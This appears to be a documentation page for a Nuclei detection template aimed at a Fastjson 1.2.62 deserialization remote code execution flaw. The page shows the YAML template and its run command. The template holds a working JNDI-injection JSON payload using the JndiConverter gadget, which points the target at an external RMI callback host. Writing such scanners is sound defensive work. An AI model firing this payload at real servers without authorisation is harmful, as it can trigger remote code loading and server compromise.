Skip to content

Fastjson 1.2.62 - Remote Code Execution

ID: fastjson-1-2-62-rce

Severity: critical

Author: zh

Tags: fastjson,rce,deserialization,oast

Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability.

id: fastjson-1-2-62-rce
info:
name: Fastjson 1.2.62 - Remote Code Execution
author: zh
severity: critical
description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability.
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
tags: fastjson,rce,deserialization,oast
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"org.apache.xbean.propertyeditor.JndiConverter",
"AsText":"rmi://{{interactsh-url}}/exploit"
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200
# digest: 4a0a00473045022100e7921e83eec301aa76facfc7f1551d450ded6c77193252bd53b499d2dd055da80220023d4cd2f90dba88843ea06d1055f1af136f825f59bee30af3b7d10900029212:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml"

View on Github